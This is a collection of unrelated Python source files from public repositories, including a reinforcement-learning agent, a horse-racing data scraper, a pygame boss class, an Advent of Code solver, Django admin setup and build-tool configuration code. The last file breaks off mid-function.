self.state_size = (125, 80, repeat_freq)\n self.brain = Brain(LEARNING_RATE, input_shape = self.state_size, model_print = False)\n self.memory = Memory(self.MEMORY_CAPACITY)\n self.epsilon = 1\n self.max_explore_game = max_explore_game\n self.episode = 0\n \n def act(self, state):\n if np.random.rand() <= self.epsilon:\n return np.random.choice(self.action_space, size=1)[0]\n else:\n action_values = self.brain.predict(np.expand_dims(state, axis=0))\n action = np.argmax(action_values)\n return action\n \n def observe(self, state, action, reward, next_state, done):\n observation = (state, action, reward, next_state, done)\n self.memory.add(observation)\n \n def replay(self):\n \"\"\"\n Replay helps the model map the current state to the discounted \n reward for the action taken at that state\n \"\"\"\n batch = self.memory.sample(self.BATCH_SIZE)\n 
batch_len = len(batch)\n \n #Setting up batch to train model\n x = np.zeros((batch_len, self.state_size[0], self.state_size[1], self.state_size[2]))\n y = np.zeros((batch_len, self.action_space))\n \n #Setting up states batch\n states = np.asarray([ obs[0] for obs in batch ])\n #states = states.transpose(0,2,3,1)\n \n #Setting up future states batch\n no_state = np.zeros(self.state_size) # placeholder next state with the same shape as a single state\n states_f = np.array([ (no_state if obs[3] is None else obs[3]) for obs in batch ]) # obs[3] is next_state, obs[4] is done\n #states_f = states_f.transpose(0,2,3,1)\n \n #print(\"states shape:\", states.shape)\n #old predicted Q values\n action_predictions = self.brain.predict(states)\n #new predicted Q values\n action_predictions_f = self.brain.predict(states_f)\n print(\"future_states\",states_f.shape)\n print(\"action_predictions_f\",action_predictions_f.shape)\n \n #Future Q values\n targets_f = []\n \n for batch_index in range(batch_len):\n state, action, reward, next_state, done = batch[batch_index]\n \n if done:\n target = reward\n else:\n action_prediction_f = action_predictions_f[batch_index]\n target = reward + self.GAMMA * np.amax(action_prediction_f) #[0]\n \n target_f = action_predictions[batch_index]\n print(\"target_f\",target_f.shape)\n \n target_f[action] = target #[0]\n targets_f.append(target_f)\n \n #self.epsilon = (self.MIN_EPSILON + (self.MAX_EPSILON - self.MIN_EPSILON) \n # * math.exp(-self.LAMBDA * self.episode))\n if self.episode <= self.max_explore_game:\n self.epsilon = (((self.MIN_EPSILON-self.MAX_EPSILON)/self.max_explore_game)*self.episode\n + self.MAX_EPSILON)\n else:\n self.epsilon = self.MIN_EPSILON\n self.brain.train(states, np.asarray(targets_f), epochs=1)","repo_name":"adrian-botta/downhill_skiier_DQN","sub_path":"skiier_v0.py","file_name":"skiier_v0.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21321998760","text":"import scrapy\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport pprint\nimport csv\nimport requests\nimport sys\n\nfrom .helper.helper import get_horse_chi_name, get_jockey_chi_name, get_trainer_chi_name, get_horse_game_history, get_result_by_distance, get_class_change, get_hourse_condition, get_horse_age\n\nclass RecentMatchSpider(scrapy.Spider):\n name = 'RecentMatch_crawler'\n allowed_domains = ['bet.hkjc.com']\n start_urls = ['https://bet.hkjc.com/racing/pages/odds_wp.aspx/?lang=ch']\n match_content = dict()\n\n def parse(self, response):\n url = self.start_urls[0]\n match_info = response.xpath('//div[@class=\"mtgInfoDV\"]//text()').extract()\n self.match_date = match_info[0]\n self.match_date = self.match_date[:self.match_date.find(',')]\n self.match_date = datetime.strptime(self.match_date, '%d/%m/%Y')\n self.match_date = datetime.strftime(self.match_date, '%Y/%m/%d')\n self.match_content['match_date'] = self.match_date\n self.match_place = [match_info[-1]] # chinese place name\n # Get the English place name\n englist_info = requests.get('https://bet.hkjc.com/racing/pages/odds_wp.aspx/?lang=en')\n englist_info = BeautifulSoup(englist_info.content, 'html.parser') #Get the English place name\n match_place_eng = englist_info.find('div', attrs={'class': \"mtgInfoDV\"}).text\n match_place_eng = match_place_eng.split(',')[-1]\n match_place_eng = match_place_eng.lower().strip()\n self.match_place.append(match_place_eng)\n\n self.match_content['match_date'] = self.match_date\n self.match_content['match_place'] = 
self.match_place\n\n number_of_match = len(response.xpath('//div[contains(@id, \"raceSel\")]').extract())\n for race_number in range(1, number_of_match+1):\n match_info_url = 'https://bet.hkjc.com/racing/index.aspx/?lang=en&date={}&venue=ST&raceno={}'.format(self.match_date, race_number)\n yield scrapy.Request(match_info_url, callback=self.match_detail)\n #pprint.pprint(self.match_content)\n\n # match_info_url = 'https://bet.hkjc.com/racing/index.aspx/?lang=en&date={}&venue=ST&raceno={}'.format(self.match_date, 1)\n # yield scrapy.Request(match_info_url, callback=self.match_detail)\n\n def match_detail(self, response):\n '''\n :param response:\n :return:\n match_content = {'race_number':\n {'Race Info': [race_time, race_class, race_course, race_distance],\n {'Race Horse': {'number': str(),\n 'name': str(),\n 'draw': int(),\n 'jockey': str(),\n 'trainer': str(),\n 'last 6 Runs': list(),\n 'same distance game result': list(),\n 'class change': str()}}},\n 'match_date': str(),\n 'match_place': str()\n\n }\n '''\n\n race_number = response.xpath('//div[contains(@style, \"float:left;vertical-align:middle;width:85%\")]/span/strong/text()').extract_first()\n self.match_content[race_number] = dict()\n #Race Info\n race_info = response.xpath('//div[contains(@style, \"float:left;vertical-align:middle;width:85%\")]/span[contains(@class, \"content\")]//text()').extract()\n race_time = race_info[3].replace(',','').lower().strip()\n race_class = race_info[5].replace(',','').lower().strip()\n race_course = race_info[7].replace(',','').lower().strip()\n race_track = race_info[9].replace(',','').upper().strip().replace('COURSE','').replace('\"','')\n\n if race_course == 'ALL WEATHER TRACK'.lower().strip():\n race_distance = race_info[9].replace(',', '').lower().replace('m', '').strip()\n else:\n race_distance = race_info[11].replace(',','').lower().replace('m','').strip()\n self.match_content[race_number]['Race Info'] = [race_time, race_class, race_course, race_track, race_distance]\n self.match_content[race_number]['Race Horse'] = dict()\n print ('\\n\\n')\n print (race_number)\n print(self.match_content[race_number]['Race Info'])\n #Race Horse\n all_horse = response.xpath('//tr[contains(@height, \"22px\")]').extract()\n #loop over horse\n for horse in all_horse:\n horse = BeautifulSoup(horse, \"html.parser\")\n horse = horse.select(\"td[class*='tableContent']\")\n\n # Draw if no draw then skip it\n skip_row = False\n horse_draw = horse[5].get_text().strip()\n\n try:\n horse_draw = int(horse_draw)\n #self.match_content[race_number]['Race Horse']['draw'] = horse_draw\n except ValueError:\n skip_row = True\n\n if skip_row:\n continue\n # Horse number\n Horse_number = horse[1].get_text()\n try:\n Horse_number = int(Horse_number)\n except:\n Horse_number = 0\n self.match_content[race_number]['Race Horse'][Horse_number] = dict()\n self.match_content[race_number]['Race Horse'][Horse_number]['draw'] = horse_draw\n\n\n #star or plus\n try:\n star = False\n plus = False\n #get all horse image\n imgs = horse[0].findAll('img')\n for img in imgs:\n src = img['src']\n if 'star' in src:\n star = True\n if 'plus' in src:\n plus = True\n except:\n star = None\n plus = None\n self.match_content[race_number]['Race Horse'][Horse_number]['star'] = star\n self.match_content[race_number]['Race Horse'][Horse_number]['plus'] = plus\n\n # Horse Name, Horse Chi Name\n try:\n horse_name = horse[3].get_text().strip()\n horse_chi_name = get_horse_chi_name(horse_name)\n horse_horse_age = get_horse_age(horse_name)\n except:\n 
horse_chi_name = None\n horse_horse_age = None\n self.match_content[race_number]['Race Horse'][Horse_number]['name'] = horse_chi_name\n self.match_content[race_number]['Race Horse'][Horse_number]['age'] = horse_horse_age\n\n #jockey\n try:\n jockey_name = horse[7].get_text().strip()\n if jockey_name.find('(') > 0: #jockey has (-XX)\n jockey_name = jockey_name[:jockey_name.find('(')].strip()\n jockey_chi_name = get_jockey_chi_name(jockey_name)\n except:\n jockey_chi_name = None\n self.match_content[race_number]['Race Horse'][Horse_number]['jockey'] = jockey_chi_name\n\n # trainer\n try:\n trainer_name = horse[8].get_text().strip()\n trainer_chi_name = get_trainer_chi_name(trainer_name)\n except:\n trainer_chi_name = None\n self.match_content[race_number]['Race Horse'][Horse_number]['trainer'] = trainer_chi_name\n\n ###\n try:\n horse_game_history = get_horse_game_history(horse_name)\n except:\n horse_game_history = None\n ###\n # 'last 6 Runs'\n try:\n all_place = []\n for game in horse_game_history: # loop all the match\n try:\n place = int(game[1])\n except ValueError:\n place = 7 # name as 7 if no place\n all_place.append(place)\n\n while len(all_place) < 6: # if not enough 6 past game\n all_place.append(7) # name as 7 for that match\n\n last_6_place = all_place[:6]\n except:\n last_6_place = []\n self.match_content[race_number]['Race Horse'][Horse_number]['last 6 Runs'] = last_6_place\n\n # 'same distance game result'\n try:\n same_distance = get_result_by_distance(horse_game_history, int(race_distance), self.match_place[-1], self.match_content[race_number]['Race Info'][2])\n except:\n same_distance = []\n self.match_content[race_number]['Race Horse'][Horse_number]['same distance game result'] = same_distance\n\n # class change\n try:\n game_history_class, class_change = get_class_change(horse_game_history, race_class)\n except:\n class_change = None\n game_history_class = None\n self.match_content[race_number]['Race Horse'][Horse_number]['class change'] = class_change\n self.match_content[race_number]['Race Horse'][Horse_number]['game_history_class'] = game_history_class\n\n\n # last game date\n try:\n last_game_date, last_game_days_delta, status = get_hourse_condition(horse_game_history, self.match_date)\n except:\n last_game_date = None\n last_game_days_delta = None\n status = None\n self.match_content[race_number]['Race Horse'][Horse_number]['last game date'] = last_game_date\n self.match_content[race_number]['Race Horse'][Horse_number]['last game date delta'] = last_game_days_delta\n self.match_content[race_number]['Race Horse'][Horse_number]['status'] = status\n print (race_number)\n print (self.match_content[race_number])\n\n\n def closed(self, reason):\n #print (self.match_content.keys())\n total_race = len(self.match_content.keys()) - 2\n print (total_race)\n #pprint.pprint(self.match_content)\n print('Spider ended:', reason)\n\n with open('recent_match.csv', 'w') as recent_csv:\n wr = csv.writer(recent_csv, quoting=csv.QUOTE_ALL)\n heeder_row = ['' for i in range(11)]\n heeder_row += ['Match Date:', self.match_content['match_date'],'','Match Place:', self.match_content['match_place']]\n #wr.writerow(heeder_row)\n #wr.writerow([])\n print (self.match_content)\n for race_num in range(1, total_race+1):\n race_key = 'Race {}'.format(race_num)\n race_row = ['' for i in range(11)] + [race_key]\n #wr.writerow(race_row)\n print ('\\n\\n\\n')\n print (race_key)\n print (self.match_content[race_key])\n match_date = self.match_content['match_date']\n match_course = ''\n if 
self.match_content[race_key]['Race Info'][2] == 'ALL WEATHER TRACK'.lower():\n match_course = '田泥'\n else:\n if self.match_content['match_place'][-1] == 'sha tin':\n match_course = '田草'\n if self.match_content['match_place'][-1] == 'happy valley':\n match_course = '谷草'\n match_class = self.match_content[race_key]['Race Info'][1]\n match_distance = self.match_content[race_key]['Race Info'][4]\n track = self.match_content[race_key]['Race Info'][3]\n\n\n match_info = ['' for i in range(11)] + ['Match Time:', match_date,\n '',\n '班次:', match_class,\n '',\n '跑道:', self.match_content[race_key]['Race Info'][2],\n '',\n '賽道:', track,\n '',\n '賽程:', match_distance,\n ]\n #wr.writerow(match_info)\n\n wr.writerow (['日期', '場次', '跑道', '班次', '路程', '賽道', '場地狀況', '預計步速', '預計疊數', '預計跑法', '評分優勢',\n '馬號', '王牌', '優先', '檔位', '馬名', '馬齡', '騎師', '練馬師',\n 'last game 1', 'last game 2', 'last game 3', 'last game 4', 'last game 5', 'last game 6',\n '同路程次數', '同路程冠', '同路程亞', '同路程季', '同路程殿',\n '上場班次','兩場前班次','三場次班次','升/降班', '上次比賽日', '離上次比賽日數', '狀態'\n ])\n\n horse_number = 0 # ensure the hourse number will be in order 1 - 14\n\n\n for horse_num, horse_detail in self.match_content[race_key]['Race Horse'].items():\n horse_number += 1\n horse_row = [match_date, race_key, match_course, match_class, match_distance, track]\n for i in range(5):\n horse_row.append('')\n if horse_num != horse_number:\n horse_row.append(horse_number)\n wr.writerow(horse_row)\n #reset\n horse_row = [match_date, race_key, match_course, match_class, match_distance, track]\n for i in range(5):\n horse_row.append('')\n horse_number = horse_num\n # else:\n horse_row.extend([horse_num, horse_detail['plus'], horse_detail['star'], horse_detail['draw'], horse_detail['name'], horse_detail['age'], horse_detail['jockey'], horse_detail['trainer']])\n for place in horse_detail['last 6 Runs']:\n horse_row.append(place)\n for result in horse_detail['same distance game result']:\n horse_row.append(result)\n for i in range(3):\n try:\n content = horse_detail['game_history_class'][i]\n horse_row.append(content)\n except:\n horse_row.append('No game history')\n horse_row.append(horse_detail['class change'])\n horse_row.append(horse_detail['last game date'])\n horse_row.append(horse_detail['last game date delta'])\n horse_row.append(horse_detail['status'])\n\n\n\n wr.writerow(horse_row)\n\n while horse_number <= 14: # less than 14 horse\n horse_row = [match_date, race_key, match_course, match_class, match_distance, track]\n for i in range(5):\n horse_row.append('')\n horse_row.append(horse_number)\n wr.writerow(horse_row)\n horse_number += 1\n\n\n\n #wr.writerow([])\n\n\n\n\n #pprint.pprint(self.match_content)\n\n #\n # ###############\n # ### testing ###\n # ###############\n # tmp_horse = all_horse[-3]\n # tmp_horse = BeautifulSoup(tmp_horse, \"html.parser\")\n # tmp_horse_all_data = tmp_horse.select(\"td[class*='tableContent']\")\n #\n # #Draw if no draw then skip it\n # skip_row = False\n # horse_draw = tmp_horse_all_data[4].get_text().strip()\n # try:\n # horse_draw = int(horse_draw)\n # self.match_content[race_number]['draw'] = horse_draw\n # except ValueError:\n # skip_row = True\n #\n # #number\n # Horse_number = tmp_horse_all_data[1].get_text()\n # try:\n # Horse_number = int(Horse_number)\n # except:\n # pass\n # self.match_content[race_number]['Race Horse']['number'] = Horse_number\n #\n # #Horse Name, Horse Chi Name\n # horse_name = tmp_horse_all_data[3].get_text().strip()\n # horse_chi_name =get_horse_chi_name(horse_name)\n # 
self.match_content[race_number]['Race Horse']['name'] = horse_chi_name\n #\n # #jockey\n # jockey_name = tmp_horse_all_data[6].get_text().strip()\n # if jockey_name.find('(') > 0: #jockey has (-XX)\n # jockey_name = jockey_name[:jockey_name.find('(')].strip()\n # print (jockey_name)\n # jockey_chi_name = get_jockey_chi_name(jockey_name)\n # self.match_content[race_number]['Race Horse']['jockey'] = jockey_chi_name\n #\n # #trainer\n # trainer_name = tmp_horse_all_data[7].get_text().strip()\n # trainer_chi_name = get_trainer_chi_name(trainer_name)\n # self.match_content[race_number]['Race Horse']['trainer'] = trainer_chi_name\n #\n # ###\n # horse_game_history = get_horse_game_history(horse_name)\n # ###\n # #'last 6 Runs'\n # all_place = []\n # for game in horse_game_history: # loop all the match\n # try:\n # place = int(game[1])\n # except ValueError:\n # place = 7 #name as 7 if no place\n # all_place.append(place)\n #\n # while len(all_place)< 6: #if not enough 6 past game\n # all_place.append(7) #name as 7 for that match\n #\n # last_6_place = all_place[:6]\n # self.match_content[race_number]['Race Horse']['last 6 Runs'] = last_6_place\n #\n # #'same distance game result'\n # same_distance = get_result_by_distance(horse_game_history, int(race_distance))\n # self.match_content[race_number]['Race Horse']['same distance game result'] = same_distance\n #\n # # class change\n # class_change = get_class_change(horse_game_history, race_class)\n # self.match_content[race_number]['Race Horse']['class change'] = class_change\n #\n #\n # pprint.pprint (self.match_content)\n\n\n\n","repo_name":"cfcdavidchan/HKJC","sub_path":"HKJC_crawler/HKJC_crawler/spiders/RecentMatch_crawler.py","file_name":"RecentMatch_crawler.py","file_ext":"py","file_size_in_byte":18453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39097136844","text":"import random\n\nimport pygame\nfrom settings import *\nfrom entity import Entity\nfrom debug import *\nfrom projectile import Projectile\nimport numpy as np\nclass Boss(pygame.sprite.Sprite):\n def __init__(self,pos,groups,player):\n super().__init__(groups)\n\n self.image = pygame.image.load('./graphics/test/boss.png').convert_alpha()\n DEFAULT_IMAGE_SIZE = (256, 276)\n self.image = pygame.transform.scale(self.image, DEFAULT_IMAGE_SIZE)\n self.health = 300\n self.pos = pos\n self.rect = self.image.get_rect(topleft = pos)\n self.attack_direction = pygame.math.Vector2()\n self.projectile_sprites = pygame.sprite.Group()\n self.attacking = False\n self.attack_cooldown = 600\n self.attack_time = None\n self.player = player\n self.victory = False\n def create_bullet(self):\n vector = np.array([self.rect.x - (self.player.get_player_x()), self.rect.y - (self.player.get_player_y())])\n unit_vector = vector / np.linalg.norm(vector)\n return Projectile(self.rect.x + TILESIZE/2,self.rect.y + TILESIZE/2,'boss',-unit_vector,0)\n\n def hit(self, bullets):\n for bullet in bullets:\n if bullet.rect.colliderect(self.rect) and self.health > 0:\n self.health -= bullet_dmg\n if self.health <= 50:\n self.attack_cooldown = 250\n elif self.health <= 100:\n self.attack_cooldown = 350\n elif self.health <= 120:\n self.attack_cooldown = 400\n elif self.health <= 160:\n self.attack_cooldown = 500\n\n if self.health <= 0:\n self.victory = True\n self.kill()\n bullet.kill()\n\n\n def cooldowns(self):\n current_time = pygame.time.get_ticks()\n if self.attacking:\n if current_time - self.attack_time >= self.attack_cooldown:\n self.attacking = 
False\n\n def get_proj_sp(self):\n return self.projectile_sprites\n\n def shoot(self):\n if not self.attacking:\n self.attacking = True\n self.projectile_sprites.add(self.create_bullet())\n self.attack_time = pygame.time.get_ticks()\n def update(self):\n self.shoot()\n self.cooldowns()\n","repo_name":"paulaabc/Hackathon-bitsxlaMarato-2022","sub_path":"TheBindingOfTrombosis-main/boss.py","file_name":"boss.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17989516405","text":"# AoC 2019 - Day 14a\n\ndef load_data():\n reactions = {}\n with open('example1.txt', 'r') as infile:\n d = infile.read().splitlines()\n for line in d:\n inchem, outchem = map(parse, line.split(' => '))\n # map the output chemical to a (batch size, ingredient list) tuple\n reactions[outchem[0][1]] = (outchem[0][0], inchem)\n return reactions\n\ndef parse(ingreds):\n i = []\n for ingred in ingreds.split(', '):\n num, chem = ingred.split(' ')\n i.append([int(num), chem])\n return i\n\ndef find_amount(reactions):\n needs = {'FUEL': 1}\n leftovers = {}\n ore = 0\n\n while needs:\n chem, needed = needs.popitem()\n # use up leftovers from earlier reactions first\n used = min(needed, leftovers.get(chem, 0))\n needed -= used\n leftovers[chem] = leftovers.get(chem, 0) - used\n if needed == 0:\n continue\n amnt, ingreds = reactions[chem]\n mult = -(-needed // amnt) # ceiling division: whole batches only\n leftovers[chem] = leftovers.get(chem, 0) + amnt * mult - needed\n for num, ingred in ingreds:\n if ingred == 'ORE':\n ore += num * mult\n else:\n needs[ingred] = needs.get(ingred, 0) + num * mult\n return ore\n\ndef main():\n print(find_amount(load_data()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Azcobu/advent-of-code","sub_path":"2019/day14/aoc2019-14a.py","file_name":"aoc2019-14a.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16433905546","text":"from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom .models import ParadaDeMaquina, Funcionario, Maquina\nfrom django.contrib.auth.models import Group\nadmin.site.site_header= \" NextMan | admin \"\nadmin.site.site_title = \" NextMan | admin \"\nadmin.site.site_footer = \" Soluções em Sistemas\"\n# Register your models here.\n\n\n\nclass ParadasDeMaquinaAdmin(admin.ModelAdmin):\n list_display = ['id','tipoServico', 'maquina','tipoManutencao','horaOcorencia','horaReinicio', 'duracao','turno','operador','descricao']\n list_filter = ['id','tipoServico', 'maquina','tipoManutencao','horaOcorencia','horaReinicio', 'duracao','turno','operador','descricao']\n #list_editable = ['nomeMaquina', 'motivo', 'tipoManutencao', 'dataParada', 'DataReinicio', 'turno','observacoes']\nadmin.site.register(ParadaDeMaquina,ParadasDeMaquinaAdmin)\n\n\n\n\nclass FuncionarioAdmin(admin.ModelAdmin):\n list_display = ['id','nome', 'funcao']\n list_filter = ['id','nome', 'funcao']\n\nadmin.site.register(Funcionario, FuncionarioAdmin)\n\nclass MaquinaAdmin(admin.ModelAdmin):\n list_display = ['id','nomeMaquina']\n list_filter = ['id','nomeMaquina']\n\nadmin.site.register(Maquina, MaquinaAdmin)","repo_name":"ErmirioABonfim/DjangoHeroku","sub_path":"nextman/ocorrencias/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11884617896","text":"# encoding=utf8\n\n\"\"\" The response object\n Author: lipixun\n Created Time : 三 12/ 2 16:32:06 2015\n\n File Name: response.py\n Description:\n\n\"\"\"\n\nfrom Cookie import SimpleCookie\n\nfrom unifiedrpc.protocol import Response\n\nclass WebResponse(Response):\n \"\"\"The web response\n \"\"\"\n def __init__(self, status = 200, cookies = None, **kwargs):\n \"\"\"Create a 
new WebResponse\n \"\"\"\n self.status = status\n self.cookies = cookies or SimpleCookie()\n # Super\n super(WebResponse, self).__init__(**kwargs)\n\n def redirect(self, location, code = 302):\n \"\"\"Redirect this response\n \"\"\"\n self.headers[\"Location\"] = location\n self.status = code\n","repo_name":"penfree/pyunified-rpc","sub_path":"unifiedrpc/adapters/web/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71095500353","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.Enums import Format\n\ndef ZDCRecOutputCfg(flags):\n \"\"\"defines outputs for ESD and AOD; provides the same information as in ForwardRec/ZDC_Rec_OutputItemList_jobOptions.py\"\"\"\n from OutputStreamAthenaPool.OutputStreamConfig import OutputStreamCfg\n acc = ComponentAccumulator()\n \n ZDC_ItemList=[]\n\n if flags.Input.Format is Format.BS:\n # ZDC Silicon hits containers\n ZDC_ItemList.append(\"xAOD::ZdcModuleContainer#ZdcModules\")\n ZDC_ItemList.append(\"xAOD::ZdcModuleAuxContainer#ZdcModulesAux.\")\n\n if flags.Output.doWriteESD:\n acc.merge(OutputStreamCfg(flags, \"ESD\", ZDC_ItemList))\n if flags.Output.doWriteAOD:\n acc.merge(OutputStreamCfg(flags, \"AOD\", ZDC_ItemList))\n return acc\n\n\ndef ZDCRecCfg(flags):\n \"\"\"defines ZDC reconstruction; provides the same setup as used to be in ForwardRec/ForwardRec_jobOptions.py\"\"\"\n acc = ComponentAccumulator()\n \n if flags.Input.Format is Format.BS:\n from AthenaConfiguration.ComponentFactory import CompFactory\n \n acc.addEventAlgo(CompFactory.ZdcByteStreamLucrodData(\"ZdcByteStreamLucrodData\"))\n acc.addEventAlgo(CompFactory.ZdcRecRun3(\"ZdcRecRun3\"))\n \n # Setup output\n if flags.Output.doWriteESD or flags.Output.doWriteAOD:\n acc.merge(ZDCRecOutputCfg(flags))\n \n return acc\n\n\nif __name__ == \"__main__\":\n\n from AthenaConfiguration.AllConfigFlags import initConfigFlags\n flags = initConfigFlags()\n flags.Scheduler.CheckDependencies = True\n flags.Scheduler.ShowDataDeps = True\n flags.Scheduler.ShowDataFlow = True\n flags.Scheduler.ShowControlFlow = True\n flags.Scheduler.EnableVerboseViews = True\n \n flags.Input.Files = [\"/eos/atlas/atlascerngroupdisk/det-zdc/ZDCRuns/2021/data21_900GeV/main/data21_900GeV.00405396.physics_Main.daq.RAW/data21_900GeV.00405396.physics_Main.daq.RAW._lb0211._SFO-13._0001.data\"]\n \n flags.Exec.MaxEvents=500\n flags.Concurrency.NumThreads=4\n \n flags.fillFromArgs() # enable unit tests to switch only parts of reco: python -m HIRecConfig.HIRecConfig HeavyIon.doGlobal = 0 and so on\n flags.lock()\n flags.dump()\n \n from AthenaConfiguration.MainServicesConfig import MainServicesCfg\n acc = MainServicesCfg(flags)\n acc.getEventAlgo(\"SGInputLoader\").FailIfNoProxy = True # enforce no missing data\n \n \n from ByteStreamCnvSvc.ByteStreamConfig import ByteStreamReadCfg\n acc.merge(ByteStreamReadCfg(flags))\n\n acc.merge(ZDCRecCfg(flags))\n \n from AthenaCommon.Constants import DEBUG\n acc.foreach_component(\"*ZDC*\").OutputLevel=DEBUG\n \n acc.printConfig(withDetails=True, summariseProps=True)\n \n status = acc.run()\n if status.isFailure():\n import sys\n 
sys.exit(-1)\n\n\n","repo_name":"Yusuf-Manjra/athena","sub_path":"ForwardDetectors/ForwardRec/python/ZDCRecConfig.py","file_name":"ZDCRecConfig.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28839628782","text":"import os\nimport subprocess\nimport shutil\nimport logging\nimport xmltodict\nimport copy\nimport re\nfrom codecs import open\n\nfrom os import getcwd\nfrom os.path import basename, join, normpath\nfrom collections import OrderedDict\nfrom project_generator_definitions.definitions import ProGenDef\n\nfrom .tool import Tool, Builder, Exporter\nfrom ..util import SOURCE_KEYS\n\nlogger = logging.getLogger('progen.tools.uvision')\n\nclass uVisionDefinitions():\n\n debuggers = {\n 'ulink2-me': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\UL2CM3.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\UL2CM3.DLL',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '1',\n 'pMon': 'BIN\\\\UL2CM3.DLL',\n },\n 'SetRegEntry' : {\n 'Key' : 'UL2CM3',\n },\n },\n },\n 'cmsis-dap': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\CMSIS_AGDI.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\CMSIS_AGDI.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '12',\n 'pMon': 'BIN\\\\CMSIS_AGDI.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'CMSIS_AGDI',\n },\n },\n },\n 'j-link': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'Segger\\\\JL2CM3.dll',\n },\n 'Utilities': {\n 'Flash2': 'Segger\\\\JL2CM3.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '6',\n 'pMon': 'Segger\\\\JL2CM3.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'JL2CM3',\n },\n },\n },\n 'ulink-pro': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\ULP2CM3.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\ULP2CM3.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '7',\n 'pMon': 'BIN\\\\ULP2CM3.DLL',\n },\n 'SetRegEntry' : {\n 'Key' : 'ULP2CM3',\n },\n },\n },\n 'st-link': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'STLink\\\\ST-LINKIII-KEIL_SWO.dll',\n },\n 'Utilities': {\n 'Flash2': 'STLink\\\\ST-LINKIII-KEIL_SWO.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '11',\n 'pMon': 'STLink\\\\ST-LINKIII-KEIL_SWO.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'ST-LINKIII-KEIL_SWO',\n },\n },\n },\n 'nu-link': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\Nu_Link.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\Nu_Link.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '9',\n 'pMon': 'NULink\\\\Nu_Link.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'Nu_Link',\n },\n },\n },\n }\n\n # use cmsis-dap debugger as default\n debuggers_default = 'cmsis-dap'\n\n\nclass Uvision(Tool, Builder, Exporter):\n\n optimization_options = ['O0', 'O1', 'O2', 'O3']\n file_types = {'cpp': 8, 'c': 1, 's': 2, 'obj': 3,'o':3, 'lib': 4, 'ar': 4, 'h': 5}\n\n # flags mapping to uvision uvproj dics\n # for available flags, check armcc/armasm/armlink command line guide\n # this does not provide all options within a project, most usable options are\n # exposed via command line, the rest is covered via template project files\n FLAGS_TO_UVISION = {\n 'asm_flags': 'Aads',\n 'c_flags': 'Cads',\n 'cxx_flags': 'Cads',\n 'ld_flags': 'LDads',\n }\n\n ERRORLEVEL = {\n 0: 'success (0 warnings, 0 errors)',\n 1: 'warnings',\n 2: 'errors',\n 3: 'fatal errors',\n 11: 'cant write to project file',\n 12: 'device error',\n 13: 'error writing',\n 15: 'error reading xml file',\n }\n\n SUCCESSVALUE = 0\n WARNVALUE = 1\n\n generated_project = 
{\n 'path': '',\n 'files': {\n 'uvproj': '',\n }\n }\n\n def use_armclang(self):\n return False\n\n def __init__(self, workspace, env_settings):\n self.definitions = uVisionDefinitions()\n # workspace or project\n self.workspace = workspace\n self.env_settings = env_settings\n self.uvproj_file = join(self.TEMPLATE_DIR, \"uvision.uvproj\")\n self.uvmpw_file = join(self.TEMPLATE_DIR, \"uvision.uvmpw\")\n self.uvoptx_file = join(self.TEMPLATE_DIR, \"uvision.uvoptx\")\n\n @staticmethod\n def get_toolnames():\n return ['uvision']\n\n @staticmethod\n def get_toolchain():\n return 'uvision'\n\n def _expand_one_file(self, source, new_data, extension):\n ordered = OrderedDict()\n ordered[\"FileType\"] = self.file_types[extension]\n ordered[\"FileName\"] = basename(source)\n ordered[\"FilePath\"] = source\n return ordered\n\n def _normalize_mcu_def(self, mcu_def):\n for k, v in mcu_def['TargetOption'].items():\n mcu_def['TargetOption'][k] = v[0]\n\n def _uvproj_clean_xmldict(self, uvproj_dic):\n for k, v in uvproj_dic.items():\n if v is None:\n uvproj_dic[k] = ''\n\n def _uvproj_set_CommonProperty(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n\n def _uvproj_set_DebugOption(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n self._uvproj_clean_xmldict(uvproj_dic['SimDlls'])\n 